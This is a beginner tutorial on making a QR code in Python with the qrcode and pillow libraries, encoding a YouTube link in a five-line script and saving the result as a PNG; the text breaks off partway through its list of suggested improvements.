follow-up question, is the UartGetByte() safe to call without any buffersize checking...??? Having an API is nice, but now there should be document to describe best practices and how to do it properly, if I simply cannot rely on an API-function to be working flawlessly/safe/no effect other than described in the API documentation... to me that sounds strange/silly/... Looking into the source code of the GetByte the same if(0u != HOST_SpiUartGetRxBufferSize()) is implemented, but there is 1 call just before the getsize, intSourceMask = HOST_SpiUartDisableIntRx(); maybe this interrupt off/on switching is not 100% safe when buffer is emty, but do not understand why it doesn't cause havoc bit later in time... sidestepping: I remember from the past I have seen big problems with the receive buffer if using GetChar and GetByte API's mixed, and that could be solved by wrapping it as a CriticalSection... not nice but it works. to be complete: The characters where reported to the application out-of-order under heavy stress conditions I did do the CriticalSection trick with the original project source, didn't solve the issue... Thanks again for the solution, at least this part of the system can now be fully tested ;-) You probably did not read the comments on the UartGetByte() function and the way you programmed your access. When you try to read a byte when there is none, 1st you receive 0x00; 2nd the underrun flag will be set. additional comment in datasheet: "The errors bits may not correspond with reading characters due to RX FIFO and software buffer usage." So you get the error-flag set and skip the transfer. Bob Hi Bob, I did read the comment, but did interpret it differently... Your clarification makes much more sense!!! Thanks for the support ! You are always welcome! Bob Hi bob, I used above project to echo numbers (0-9) serially at 57600 baudrate from arduino to PSoC 4 pioneer kit, But some numbers are missing. The screenshot of Teraterm is attached below. The serial communication works perfect for other low baudrates (9600,19200)- why? please help me to fix this. Can you please post your actual project workspace again to let us check all the settings. Bob
http://www.cypress.com/forum/psoc-4-architecture/psoc4-uart-strangeness-example-code
CC-MAIN-2016-44
refinedweb
925
63.29
Opened 5 years ago Closed 4 years ago #11208 closed bug (fixed) POSIX semaphores have incorrect sharing semantics Description POSIX semaphores should only be shared between processes if a non-zero pshared value is given to sem_init, and the semaphore resides in a shared region of memory (like a PTHREAD_PROCESS_SHARED mutex). The POSIX spec is not explicit about it, but this is how Linux and FreeBSD behave. Haiku ignores the latter requirement, so pshared semaphores in private memory (e.g. the stack or heap) are shared after a fork. Test case: #include <semaphore.h> #include <unistd.h> #include <assert.h> #include <stdio.h> int main() { sem_t sem; int res = sem_init(&sem, 1, 0); assert(res == 0); int pid = fork(); assert(pid != -1); if (pid == 0) { res = sem_post(&sem); assert(res == 0); } else { res = sem_wait(&sem); assert(res == 0); } printf("End\n"); return 0; } The parent process should wait indefinitely on the semaphore, but it does not. Attachments (1) Change History (7) comment:1 by , 5 years ago by , 4 years ago comment:2 by , 4 years ago comment:3 by , 4 years ago Attached is a patch which reimplements unnamed POSIX semaphores using the user_mutex hashtable wait mechanism. Two new system calls are added: _user_mutex_sem_acquire and _user_mutex_sem_release. Unnamed semaphores now consist of an int32_t in userspace. Acquires and releases are done using atomic ops in userspace when the semaphore has no waiters (when the semaphores value is >= 0). When the semaphore is contended the value is set to -1 and the system calls are used to acquire or release. I've run the POSIX test suite stress tests for semaphores and all seems well, however I thought I'd post it here for a second opinion first. comment:4 by , 4 years ago I'm not familiar with the user mutexes at all, I just wonder why _user_mutex_sem_{acquire|release}() is a syscall, just looking at what it does. comment:5 by , 4 years ago They need to be syscalls because they enqueue (or dequeue) the thread in the global sUserMutexTable hashtable (see user_mutex_wait_locked in the patch) for later waking up, which enables implementation of process shared mutexes and semaphores. The reason for repeating the atomic ops in kernel space is because it's done with the sUserMutexTableLock lock held, to prevent a race with someone else releasing the semaphore. With the lock held, a thread acquiring the semaphore will set it to -1, to mark it as contended. Any thread releasing the semaphore will then notice this value and use the system call to release it, and take the same lock when waking up the original thread. Move POSIX compatibility related tickets out of R1 milestone (FutureHaiku/Features).
https://dev.haiku-os.org/ticket/11208
CC-MAIN-2019-43
refinedweb
449
60.45
Accept a list of alternative names in ffi.dlopen() So, ffi.dlopen('cairo') opens libcairo.so.2 on Linux and ffi.dlopen('libcairo-2') opens libcairo-2.dll on Windows, but I haven’t found a name that works on both. I’ll add something like this to cairocffi: def dlopen(names): for name in names: try: return ffi.dlopen(name) except OSError: pass ffi.dlopen(names[0]) # Trigger the exception again cairo = dlopen(['cairo', 'libcairo-2']) # Maybe add variants for other platforms It would be nice if ffi.dlopen() could accept a list and do this itself. You can also do which seems short enough not to warrant this list-of-variants version.
https://bitbucket.org/cffi/cffi/issues/54/accept-a-list-of-alternative-names-in
CC-MAIN-2018-13
refinedweb
114
71.51
The data-type which preceeds the name of a function is simple the value which the function can return. The object of a function is to split a program into smaller more manageable parts. By only declaring variables within functions they cannot be used anywhere else in the program and this also reduces the space for error. If you are just starting out you should consider using global variables. These are variables which are declared outside all functions including main(). (these are only really suitable for smaller programs eg. under 150 lines of code). eg. /* a simple function */ #include <stdio.h> int a, b, c; /* declaring a, b, c as integer globals */ void simple_function () { a = b + c; } main () { b = 5; c = 6; simple_function (); /* executes the function simple_function */ printf ("the value of a is %d\n", a); } The other way to use functions is to pass data by value to the functions. This can be done also easily but maybe is a difficult concept for beginners to understand. eg. /* a simple program passing data to functions */ #include <stdio.h> int simple_function (int a, int b) { int c; c = a + b; return (c); /* returns the value of c to main*/ } main () { int calculation; /* perform calculation 5 + 6 */ calculation = simple_function (5, 6); printf("the calculated value is %d\n", calculation); } I hope this helps in someway. C really is a great language though, stick at it! B. Kernighan
http://cboard.cprogramming.com/c-programming/13702-variables-do-not-equal-functions.html
CC-MAIN-2015-32
refinedweb
235
62.07
I have been working on this program for about two weeks. I missed the day that the professor covered the material necessary to code this program due to surgery. I am now behind about 5 programs that are due at the end of the week and I'm trying to teach myself what I've missed. I have asked classmates for help and what they have told me has not been working. If anyone has the free time, I would absolutely love it if you could debug this program for me. I know this community is NOT for giving homework answers. I wrote all this code on my own and cannot figure out why if won't display the correct values in their respective places in the formatting. It is a program that we were assigned in a lab one day. The program is supposed to input a name and a pay rate from a data file, and then calculate the net pay and print it to an output file in a check format. The formatting is correct but the numbers are wrong. Please help. #include <iostream> #include <string> #include <fstream> #include <iomanip> using namespace std; // Named constant definitions (and function declarations): ifstream inData; ofstream outData; // Main program: int main() { // Variable declarations: // Insert declarations from various parts below, as needed float net; float hrs; float rate; int dollars; float cents; string payto; string date; // Function body: // Insert code from Part I algorithm - inputting data from file inData.open("wages.dat"); outData.open("check.out"); getline(inData,payto); inData >> payto; inData >> rate; // Insert code from Part II algorithm - calculating net pay cout << "Please enter the total hours worked." << endl; cin >> hrs; cout << "Please enter today's date (ex. MM/DD/YYYY)." << endl; cin >> date; cout << endl; net = hrs * rate; // Insert code from Part III algorithm - determining dollars and cents dollars = net; cents = (net - dollars) * 100; // Insert code from Part IV & V of algorithm - printing check to datafile outData << endl << "12432 Somewhere St." << endl << setw(48) << left << setfill (' ') << "Russellville, AR 72802"; outData << setw(13) << setfill(' ') << right << date << setw(12) << right << setfill('_') << "Date" << endl; outData << endl; outData << setw(7) << left << setfill('_') << "Pay" << setw(47) << left; outData << setfill('_') << payto << " $" << setw(15) <<setprecision(2) << showpoint << fixed << net; outData << endl << endl << setw(18) << right << setfill(' ') << dollars << "_Dollars_&_"; outData << cents << '_' << setw(18) << left << setfill(' ') << "Cents" << endl << endl; outData << endl << setw(43) << left << setfill(' ') << "Bank of Foundations I" << setw(30); outData << right << setfill('_') << '_' << endl; // Remove block commet notation before beginning to make code visible inData.close(); outData.close(); return 0; } // end function main
https://www.daniweb.com/programming/software-development/threads/267915/please-look-at-my-code
CC-MAIN-2018-30
refinedweb
432
54.56
go to bug id or search bugs for Description: ------------ Fatal error: Uncaught TypeError: Return value of cl_forum::thread_last_timestamp() must be of the type integer, null returned in /mnt/data/www/thelounge.net/contentlounge/cms/modules/forum/api_forum.php:487 why in the world do i need return (int) here in no-strict-types mode the whole purpose of the return type would be to save the manual casting Test script: --------------- public function thread_last_timestamp(int $thread_id=0): int { switch($thread_id) { case 0: return $this->db->fetch_row($this->db->query('select' . SQL_SMALL_CACHE . 'max(fo_post_timestamp) from ' . sql_prefix . 'forum_posts;', 1, 0))[0]; default: return $this->db->fetch_row($this->db->query('select' . SQL_SMALL_CACHE . 'max(fo_post_timestamp) from ' . sql_prefix . 'forum_posts where fo_post_tid=' . $thread_id . ';', 1, 0))[0]; } } Add a Patch Add a Pull Request The "Return Type Declarations" RFC explains the reasoning in the section "Disallowing NULL on Return Types"[1]. Apparantly, this info is missing in the manual proper. [1] well, and both, not allow NULL in return types as well as for params makes the whole typing for int practically unuseable - the same way as float allows int because it's a subset in non-strict-mode NULL should be casted to 0 (int) or false (bool) because otherwise you have to still use (int)$foo and (bool)$foo in your whole code and instead save overhead because the implicit casting you add overhead by the enforced casting of return values in userland code luckily at least that below is no longer true because in PHP7 *you must* use int and not integer // Int is not a valid type declaration function answer(): int { return 42; } answer(); Catchable fatal error: Return value of answer() must be an instance of int, integer returned in %s on line %d It doesn't make sense to discuss the behavior *here*, because changing it would require an RFC anyway, see <>. > // Int is not a valid type declaration But it is, see <>. >> // Int is not a valid type declaration > But it is, see <> what do you see there? what i said "luckily no longer true" frankly i quoted the RFC you linked to! change it to integer and you get Fatal error: Uncaught TypeError: Return value of answer() must be an instance of integer, integer returned which means you must use "int" and not "integer" and playing around with function typehints shows clearly a incosistence in the RFC's and the real implementations anyways > frankly i quoted the RFC you linked to! Ah, I see. Indeed, the *example* with the `integer` type declaration has been superseded by the "Scalar Type Declarations" RFC[1], which introduced the `int` type declaration. Note that both RFCs had partially been authored at the same time. > […] and playing around with function typehints shows clearly a incosistence in the RFC's and the real implementations anyways On an, admittedly, quick glance I haven't been able to find further inconsistencies. Could you please point them out? [1] <> well try the behavior of types in function params with PHP 5.6 and 7.0 - it was enough while starting palying around that i wrote a internal list mail that our software from now on requires PHP 7.0 unconditional PHP 5.6 seems to behave like PHP 7.0 with strict mode enabled instead of doing any casting, maybe i just was confused with things like below and gave up "must be an instance of integer, integer returned" is serious bullshit - really! return/parameter casting with disabled strict mode when NULL ends in a fatal error instead cast to false/0/'' for scalar types at the end makes the features completly unusable and non-helpful because you gain nothing when you have to cast manually *and* add engine overhead instead get rid of userland casting, burden it to the engine and hope that new versions of PHP/ZendEngine/opcache and even JIT may bring a performance benefit by handle it in C code to make it short and clear: with declare(strict_types=1); throwing fatal errors is fine in case of NULL with default or declare(strict_types=1); it makes a lot of new language features useless at all - with default or declare(strict_types=1); + with default or declare(strict_types=0); > PHP 5.6 seems to behave like PHP 7.0 with strict mode enabled > instead of doing any casting, maybe i just was confused with > things like below and gave up > > "must be an instance of integer, integer returned" is serious > bullshit - really! Patches are welcome. :-)
https://bugs.php.net/bug.php?id=73717
CC-MAIN-2017-51
refinedweb
748
53.24
- Simulating Evaluate Node in MEL - particleDissolve - # construct , how to use in MEL? - print current file name without .ma or .mb extension? - Processing cost of constraints and expressions - abxPlayKeys not working in 8.5 - Requesting a MEL script: regarding menus/options - listing imageformat of renderglobals - Cloth code problems - If A Vertex Exists On An Object - How can I render multiple scenes sequentially? - API- Trouble Accessing Transform Nodes - Remove an element from an array? - rotate and translate expression - Track selections in UI - pulling heightfield information out of pond - SetFocusToNumericInputLine - 2 Questions, Poly Collision Detection and Separation... - findKeyframe reporting incorrectly - symbolButton and .xpm - Non-breaking expressions - move 0 0 0 - how to select an object with a key - Coloring the edge - Editing custom array attributes via the componentEditor - can objectTypeUI be more specific? - looking to hire a maya api tutor - Manipulating arrays - escaping bracket for match - Invalid Flag Error Please Help - Invalid redeclaration of variable - Selection Problems On Custom Shape... - python Maya API - Help declaring a tricky variable - Scriptjob to know about cameras - slow saves on scene with heavy references - KeyFrames Recorder - How do I execute a camera cut from within maya - a way to query which mouse button is pressed. - UI Problem with OptionMenu? - Button that opens specified files in specified directories - Copying hotkeys,marking menus to Maya 8.5 - How do i test if "*text*" is an element in an array? - help _ external webBrowser tool - tear off time slider ? - setExistWithoutInConnections - Is it possible to clear/unsource the MEL source cache? - open sequence in fcheck from command line? - "Make Live" and Mel - Finding in-between blendshapes? - Moving vertices by vertex color - new selection method - joint world position mel - intfields - select by type : utility nodes - editing existing lines in a text file - Quotation Marks! - using maya api outside - workspace: network paths - Query file modified date? - string array: redesigning poly selection ? - Compiling plugs on Mac OSX - roll-my-own modal dialog - duplicate deformer in 8.0 - Help Please! - Run mel script on a maya file without opening maya? - Some GUI questions. Cross platform GUI's, how to? - executing PlayBlast command from a C++ application - Bake index? - Best place to start learning python? - getFileList command and Recursion ... - A pre-cursor to MEL? - No right click menu in Maya 8.5 - manipulating Maya Objects inside a standalone application - Find groups in a scene - MEL: How to check if an image has an alpha channel - getting the object under the mouse - API:A derive problem in maya API??? - batch render with .ma - polyDisk; ????? - preload script - expression, Mel, and Fur - Mocap and MEL - Internal MEL IDE ... - Undefined symbols on MacOsx - float field UI - Batch render multiple files - how? - Data typing - int to matching ascii value - Fill Edges Tool - Help - MY OpenGL on Maya Window - node icons in hypershade - How can i make this? - Pass variable from checkbox command - Getting a UV position based on selected CV.. - Reading in and Animating an OBJ file - Particles to Rigid Bodies - Optimize OS X? - Yup, Another Reference Q&A.... - calculating correct focal distance to camera with expressions - scriptJob at cameraChange? - Help optimizing an expression - advance to next frame in mel? - Tree or forest generation with MEL - Scipt Help Please - Particle lifespan - Annotation Render Stamp - python and threading - ConnectAttr - select face at specific UV cordinate - Help needed pointOnMesh faceIndex - converting position between local and world spaces - using Maya API in a standalone application - Assign currently selected shader to currently selected object - 2^2 in mel ?! - Bevel Tool - create new file with mel - .obj out - Source scripts from internet?? Could it be? - Query a value from floatFieldGrp? - Catching Boolean Operations . . . is this possible? - velocity to rotation - Why can't I use the mel command "floatEq"? - The question about symmetric rotation and scale. - Convert text to expression string - render layer obj shader override - Manipulators Interface - Custom menu - auto complete - So you can't use preRender mel to create render Layers - How to list target shape names even if original target shapes are deleted? - Create area and volume lights with specific name in mel? - Problem with an expression and the memory - Maya Plugin - Compiling plug-in with several files - Autogrid in Maya? - compiling Comet's poseDeformer plugin for maya8.5 - proc with multiple string argument - UI command trouble - select vertices byproximity/overlap - Check UV flipping? - Multithreaded Plugin - Syntax error when trying to stor a getAttr - Maya Terminal - bash or tcsh - declaring a matrix with a variable as a dimension? - connect matrix to transform node - Pivot Script - know if reference is currently loaded - add surface to switch utility node - Delete History - Sub-frame evaluation of expression - Script Only Loads when dragged into maya - Controlling history deletion? - Maya Environment - name playblast file with a variable - xyz spread sheets to maya - Automatic import from a referenced file? - Using pointPosition - snap persp to selected camera - Dumping a texture map with faces' ids on it - Problem with reloading references Please help - Mitinstancer / SetCurrentTime - How to detect an IK handle is out of bounds? - Wher is the Syntax Error in this simple line? - smoothign button n00b ctrl - little printing issue - my first MEL script - autoRig - Select only DAG objectSets? - mel script that selects all the joints in another hierarchy.. - Couple questions on Maya plugin development - finding worldspace coordinates of a rectangle (4 corners) - Someone has ewert's scripts? - Locked nodes in references - sourcing python scripts - Deleting a Mesh - Clearing a looping array - adding maya scene fog effects and procedural texturing - Is there a way in MEL to get the right order of the selected components? - I need some Help with string array - Script Execution And Interface Execution Perform Differently - Working With The Construction History - rendering shot using the render view window - noob help with declaring variable once - Simple addVector Command using API? - Export Interactive content (SWF)in Maya? - Transform in time (API) - PRESETS editor - Retrieving MFnPluginData::kPlugin Attribute - simple mel help - Help regrading MEL Animaton - Best way to integrate a Plugin into Maya - A Script that attaches several nurbs where CVs meet, but not curves that are - lowest point on an object - vertices : last selectioned - Creating macro to display confirmDialog - Is an object in the FOV of a camera? - Mel: spreadSheet editor? - mirror and combine using mel - MPxManipContainer - Made a locator like a Manipulator - Melscript to export layers info in a excel sheet for compers. - using match to get a file from a path - Query/Set Graph Editor Channel Selection - Arrays of Arrays of strings - [API] Plug In Output - Catching output from a plugin - Return skeleton name by selecting controls - MEL Commands for setting render global values? - Detecting Particle Collisions? - windows short name for two or more word folders?? - exigency question about "ls" - $a=1/10 return 0 ??? $a=1*0.10 return 0 ?????? - xform query - New Dynamic Tesselation/Texturing Script - need help - Auto Assign Render layers - get selected attributes - please help me about a problem! - Edit point on a curve location - Multi Page Mel Window - deselect renderlayers prior to deleting them - bullet proof UV Transfer Script - anyone? - Komodo Edit / MEL Syntax - script to control a maya's toon outline width - better long name storing - Accessing pixel array from file textures - Starting imagePlane sequence later in scene. - capturing a file path?? - There is a big problem about animition,please help! - Tetris really can be made by mel??? - Clearing Up The Interface (need some help on MEL coding something) - Masking based of of Vert Velocity - script to get realworld sized texture mapping - Linux Window problem - keyframes on whole numbers - Resetting a scriptjob - How to snap a lot of object to a landscape - Even or Odd Number? - how get the normal value of a plane? - about mesh? who can tell me? - sourcing script - viewport problem - Linux IDE (MEL Editor) - repeat a command in script editor? - frameLayout question - How to tell the difference between a transform and a group using objectType? - Delete all empty nodes? - Imageplane to Polygon? - API: namespaces in scene? - like the frame cache node - creating images from programmed pixel colors - Did maya support multi array? - Did maya mel support multi array? - Local name space - Find current sound for playblast
http://forums.cgsociety.org/archive/index.php/f-89-p-18.html
CC-MAIN-2013-48
refinedweb
1,338
56.76
The objective of this post is to explain how to connect automatically to a WiFi network on MicroPython, without needing to insert all the individual commands in the prompt. The procedure was tested on both the ESP32 and the ESP8266. Introduction The objective of this post is to explain how to connect automatically to a WiFi network on MicroPython, without needing to insert all the individual commands in the prompt. The procedure was tested on both the ESP32 and the ESP8266. The prints are from the tests on the ESP32. Note that messages that are automatically printed on the ESP8266 are different from the ones on the ESP32, so the results will be different from the screenshots of this tutorial. Nevertheless, it will work the same way. We will check two approaches, one that requires importing a function from a module and executing it whenever needed to connect to the WiFi network, and another one that is fully automatic and connects the board to the WiFi network after booting. Please note that both solutions require the upload of files to MicroPython’s file system. You can consult this previous tutorial for a detailed explanation. Also, for an explanation on how to manually connect to a WiFi network, check this tutorial. All the steps are important since we are only basically encapsulating them in a function of a module. Connection on module call In this first section we will explain how to connect to the WiFi network automatically upon calling a function defined in a module. This is useful if we don’t always want to connect to the WiFi network every time we use the ESP32 / ESP8266. So, it gives us control to decide when to do it. To implement this method, we will define a simple Python function to implement the connection procedure. We will call this function connect. def connect(): #Python code goes here Then, we will import the network module, which is needed to access the functionality to connect to a WiFi network. To facilitate things, we will also store our network credentials (ssid and password) on two variables. import network ssid = "yourNetworkName" password = "yourNetworkPassword" Next, we get an instance of the station WiFi interface and store it on a variable. We will then check if we are already connected to a WiFi network. If so, we will print a warning and finish the execution. station = network.WLAN(network.STA_IF) if station.isconnected() == True: print("Already connected") return If we are not yet connected, then we activate the network interface and perform the actual connection, using the credentials stored in the previously declared variables. station.active(True) station.connect(ssid, password) Since the connection may take a while, we will do an active wait until we are connected, by checking the output of the isconnected method. Note that the pass statement is required just because of the Python syntax, since it does nothing. Also take in consideration that for the sake of simplicity we will be infinitely waiting for the connection, so if for example the WiFi credentials are wrong, the module will hang infinitely trying to connect. Naturally, for a more robust real case scenario, we would need to implement some kind of timeout mechanism. In the end, we will print a success message and the WiFi configurations while station.isconnected() == False: pass print("Connection successful") print(station.ifconfig()) The full code for the module can be seen bellow. Save the file in a directory of your choice, with a .py extension. You can name it as you like, but for this tutorial we will call it ConnectWiFi.py. def connect(): import network ssid = "yourNetworkName" password = "yourNetworkPassword" station = network.WLAN(network.STA_IF) if station.isconnected() == True: print("Already connected") return station.active(True) station.connect(ssid, password) while station.isconnected() == False: pass print("Connection successful") print(station.ifconfig()) Finally, to upload the code, just open the command line, navigate to the directory where you stored the file and hit the following command, changing COM5 by the serial port where your device is. ampy --port COM5 put ConnectWiFi.py Now, connect to the Python prompt using a software of your choice. In this tutorial we will be using Putty. There, to confirm that the new file was correctly uploaded, hit the following commands: import os os.listdir() As shown in figure 1, the file should be listed. Figure 1 – Successful upload of the WiFi connect module. Now, we simply import the module and call the connect function, as shown bellow. import ConnectWiFi ConnectWiFi.connect() The result is shown in figure 2. Note that our success message is shown at the end, indicating that we are now connected. Figure 2 – Output of the connect function call. Just to confirm our safeguard is working well, you can try to call the connect function again. It should now return a message indicating that we are already connected, as defined in the code. Check this on figure 3. Figure 3 – Warning message when calling the function after being connected to the WiFi network. Automatic connection Before going to the implementation, we need to first analyse a particularity of MicroPython which is related to some boot scripts. So, as we have seen in some previous tutorials, our MicroPython installation has a boot.py file in the file system. This is a particular file that runs when the board powers [1]. It already has some low level code, which we should not remove. As indicated in the MicroPython documentation shown here, we could use this file to put our code to connect to the WiFi network, which would be executed when the board was powered on. Nevertheless, we will follow a different approach. So, besides the boot.py, if a file called main.py exists on the file system, it will run after the completion of the boot.py script [1]. So, we will create it and use it to automatically connect to the WiFi network upon booting. Note that it can be used to implement other kind of code for our application. Also, since it is not mandatory, we can play with it without worrying. Now, to implement the automatic connection, we will reuse the previous module. So, start by creating a file called main.py. As stated before, it needs to be called this way this time (as opposed to the name of the module we defined before), or it won’t automatically execute. There, just put the importation of the ConnectWiFi module and the call to the connect function, just the same way we did manually. import ConnectWiFi ConnectWiFi.connect() Now, load the file to the file system with the command bellow (don’t forget to change COM5 by your device port). If you are still connected via Putty or other software, you need to close the connection first or this will fail. ampy --port COM5 put main.py Now reconnect back to the Python prompt. You can confirm the successful upload of the file with the os.listdir() call we did before. Note that nothing is supposed to happen, since MicroPython was already running. To check if our main.py is connecting the board to the WiFi network as specified, just reset your ESP32 / ESP8266, with the prompt open. It should now reboot and execute our function, as shown in figure 4. Figure 4 – Automatic connection after boot. We can confirm that we are connected by importing the ConnectWiFi module and trying to call the connect function. It should return the “Already connected” warning, as shown in figure 5. Figure 5 – Warning on trying to connect again to the WiFi network. Related Content Related Posts - ESP32 / ESP8266 MicroPython: Uploading files to the file system - ESP32 MicroPython: Connecting to a WiFi Network References [1]
https://techtutorialsx.com/2017/06/06/esp32-esp8266-micropython-automatic-connection-to-wifi/
CC-MAIN-2017-34
refinedweb
1,294
57.06
There are many options to troubleshoot performance issues in .NET Web Application. We can use ETW, performance logs, IIS logs, application logs, dumps and profiler. Today I am going to show how to use NP .NET Profiler to troubleshoot performance issues. You can download the tool from here Introduction .NET CLR runtime provides notification about a variety of events that occur within the .NET application. With the help of these events a .NET Profiler can analyze the performance of .NET application. These events are notified to the profiler via ICorProfilerCallback interface. This interface consist of methods such as FunctionEnter, FunctionLeave, ObjectAllocated, ExceptionThrown,etc. With the help of these events profilers can calculate which functions took long time to execution time, number of exceptions it raised, amount of memory it allocated etc. Click here for more details on profiling API NP .NET Profiler implements this ICorProfilerCallback profiling interface to profile .NET applications. NP .NET Profiler supports all versions of .NET Runtime on all Windows Operating Systems. It also supports virtual machines. NP .NET Profiler is designed to assist in troubleshooting performance, memory and first chance exception issues in the following applications: - .NET Web Applications - WCF Applications - .NET Windows Services - WPF Applications - .NET Console Applications - .NET COM Applications - Windows Azure Applications - Silverlight Applications Advantages of NP .NET Profiler - XCopy deployable - No need to install or reboot the machine - No need to recompile the application code - On Closing - Nothing left running on the machine - Very minimum overhead - Namespace based filters and time based filters during data collection, this reduces the amount of logs captured - Output files are saved in binary format - Generates detailed reports - Generates callstack for each and every individual instance of a function - Collects CPU consumption per individual instance of a function Steps to collect profiler logs NP .NET Profiler UI is wizard based. Just follow the wizard... - Extract the NP.zip file to c:\temp\np folder - Launch NP .NET Profiler by double clicking on NP.exe - Click on "New Profiler Run" button on the top left - Select "Start a New Project" and click Next button - Select ".NET 4.0 Framework" and ".NET Web Application" - Click Next button - Select AppPool and click Next button - Only this selected AppPool will be profiled - If the AppPool list is empty, type in the AppPool name - Select "Troubleshoot Performance Issues" and click Next button - Select "Namespace based filter" and click Next button - Select "Ignore System and Microsoft namespaces" and click Next button - Click Next button - Click "Start Profiling" button - When prompted to restart IIS, click yes - Launch the web application and reproduce the performance issues Reviewing profiler logs .NET Profiler generated huge number of reports. Here are the reports from a sample MVC Web Application. The problem statement for this test application is: one of the request is taking more than 10 seconds to execute. - Once the test is completed, click on the "Stop Profiling" button in the NP.exe - When prompted to restart IIS, click yes - This will restart IIS so that AppPool restarts without the profiler options - Click on "Show Reports" button - If NP.exe is closed, launch it again and click on "Open Existing output file" - By default, NP .NET Profiler will display the Total Execution Time report as shown : - Select "ASP.NET MVC Actions" in the "Advanced Query" combo box and click Refresh button as shown : - “ASP.NET MVC Actions” query shows the list of MVC requests that got executed during the profiler run. The list is sorted by Total Execution Time. - Select the top function and click on the "Individual Execution Time" button as shown : - This will show individual instances of function. In my test, there are around 16 instances of this function. One of these instances’ execution time is around 10 seconds - To review the callstack, select a instance of the function and click on the "Show Callstack" button as shown : - Expand the tree nodes - Review the "Exclusive Time" column - Notice one of the subfunction takes more time to execute I work in Prashant's team at Microsoft and this tool has helped me (and all other colleagues) so much that it is difficult to convey in a comment. If the problem is reproducible at will, this tool can help identify the problem in a very short time. I highly recommend this tool. Could someone please explain what the acronym NP stands for? NP stands for .NET Profiler 🙂 Initially it was just a small exe (np.exe) to profile console applications. We gradually added features to profiler other applications. hi, i'm a fresher working on .net platform…… i'm facing an issue. if i run the web application the web page is not loading. but this didn't not happened earlier. i did every possible try but no results. I have created a new website application in visual studio, even this is also not loading. i dont know wat is the issue….can anyone please kindly suggest me the solution. thanks in advance please share your Visual Studio solution (upload it to SkyDrive) While trying to profile a Windows Forms application, the Profiler does not generate any profiler logs: Could you fix this bug and always output an error message if the logs couldn’t be generated?
https://blogs.msdn.microsoft.com/webapps/2012/09/28/troubleshooting-performance-issues-in-web-application/
CC-MAIN-2019-09
refinedweb
870
57.06
NetBeans 6.9 Beta has been released! By mryzl on Apr 22, 2010 Since NetBeans 6.9 Beta, JavaFX Composer is a part of official NetBeans distribution. There have been significant improvements in JavaFX Composer since Preview 2. - Support for JavaFX 1.3 - More components - DataSources Query Language - Support for JavaFX Production Suite (FXD/FXZ formats) - Many usability improvements Read more in What's new in JavaFX Composer in NetBeans 6.9 Beta. Read more about NetBeans 6.9 Beta and download from netbeans.org.. Posted by Mauricio Lopez on April 28, 2010 at 08:09 AM CEST # Hi, We do not support this use-case visually but you may do it by coding: 1) Create a design and call it Main and design main part. 2) Create a design and call it Inner and design some sub-section. 3) In Inner design, select your "scene" node and set its "Generate Scene" property to FALSE. 4) In Main design, go to Source editor and write the following function to the Main class: postinit { def inner = Inner {}; insert inner.getDesignRootNodes() into scene.content; } 5) This would use just a single Scene defined in Main. and after the Main design is initialized, it would create an instance of Inner design and inserts its root-level nodes to content of the scene in Main design. 6) Note that Inner.scene property does not exist. Posted by David Kaspar on April 28, 2010 at 08:47 AM CEST # This worked. You can still use the State change functionality of the visual editor by creating a public function to update the state of Inner... public function changeState(state:String) { currentState.actual = currentState.findIndex(state); } in Main you will need to move "def inner = Inner {};" to outside of the postinit function. Hopefully this use case will be supported in the future. Thanks for you help. Posted by Mauricio Lopez on April 28, 2010 at 10:08 AM CEST # Visually embedding designs is definitely in our plans for future releases. Posted by David Kaspar on April 28, 2010 at 10:26 AM CEST #
https://blogs.oracle.com/javafxcomposer/entry/netbeans_6_9_beta_has
CC-MAIN-2015-22
refinedweb
346
66.84
Prerequisites: Python fundamentals Versions: Python 3.10, qrcode 7.3.1, Pillow 9.2.0 Read Time: 40 minutes Introduction Have you ever wondered how QR codes work or how procedural images are generated? Have you ever wanted to send someone a website link in a much cooler way? If you said yes to any of these questions, you're in luck! In this quick tutorial, we will learn how to create a QR code in Python with qrcode, pillow, and just five lines of code. Let's jump in! What Is a QR Code? The QR code, short for Quick Response code, was originally invented in 1994 by a Japanese tech company. It is a 2D barcode containing black patterns on a white background. However, this is no ordinary scribble: QR codes are capable of storing huge amounts of data in a deceivingly small amount of space. These black rectangles can store links, text, basically anything you want... and can be accessed simply by scanning from any mobile device! A QR code is important since it gives users a simple way to access something on a non-conventional source (e.g., on a piece of paper). Putting a QR code on a piece of paper is a far better and faster experience for the user than placing a website link. Due to this, QR codes are now becoming more commonly used than UPC barcodes and are found on restaurant menus, business cards, and even Superbowl ads! Enough about QR codes, let's learn how to create one! Setting Up First, go to the Python code editor of your choice (we recommend VS Code), and create a new file called qr_code.py. This is where we will be writing our code. Note: You can call your file any name except qrcode.py. This is because qrcode.py is a file that already exists as part of the qrcode library that we will use, and calling your file that will overwrite the library functions. To start, we need to install the two libraries: - The qrcodelibrary: This library lets us perform all of our QR code related operations. - The pillowlibrary: This library helps us process and save images. To install qrcode and pillow, run this command inside the VS Code terminal: pip install qrcode pillow For this tutorial, we are using qrcode version 7.3.1 and Pillow version 9.2.0. Next, add this line of code to the first line of qr_code.py: import qrcode This line of code makes sure that the two libraries can be used in the rest of our code, since Python code runs from top to bottom in a file. We just need to import qrcode, because pillow is implicitly imported. Creating the QR Code First, we want a link that we want to showcase. Let's use a classic YouTube video. We can store this YouTube URL into a variable called website_link: website_link = '' Next, we want to create an instance of qrcode. Since it's a Python library, we can call the package constructor to create a qrcode object, customized to our specifications. In this example, we will create a QR code with a version of 1, and a box size and border size of 5. qr = qrcode.QRCode(version = 1, box_size = 5, border = 5) - The versionparameter is an integer from 1 to 40 that controls the size of the QR code. - The box_sizeparameter controls how many pixels each “box” of the QR code is. - The borderparameter controls how many boxes thick the border should be. As an exercise, try taking in these parameters as input, and explaining to the user how to set this up, so they can create the QR code to their own specifications. Visit documentation for more information about the parameters in qrcode.QRCode(...). Then, the data (specifically, the link we specified before) is added to the QR code, using .add_data(). The QR code is then generated using .make(): qr.add_data(website_link) qr.make() Finally, we save this created QR code in an img pillow object using qr.make_image(): img = qr.make_image(fill_color = 'black', back_color = 'white') - Setting the line color fill_colorto black. - Setting the background color back_colorto white. Finally, we have to store and save the file. We can do this using pillow's save() command. We specify the file name inside the brackets, which is youtube_qr.png in our case. img.save('youtube_qr.png') Now we are done! Here’s the whole code: import qrcode website_link = '' qr = qrcode.QRCode(version = 1, box_size = 5, border = 5) qr.add_data(website_link) qr.make() img = qr.make_image(fill_color = 'black', back_color = 'white') img.save('youtube_qr.png') You should see the youtube_qr.png image pop up on the left-hand side of VS Code, and you can open it to see what it looks like. You can add this QR code to anywhere you like, on your website or in an email! Improvements To improve this, we could do a couple of things: - Allow the website link to be typed in using input()function. - Allow users to customize the QR 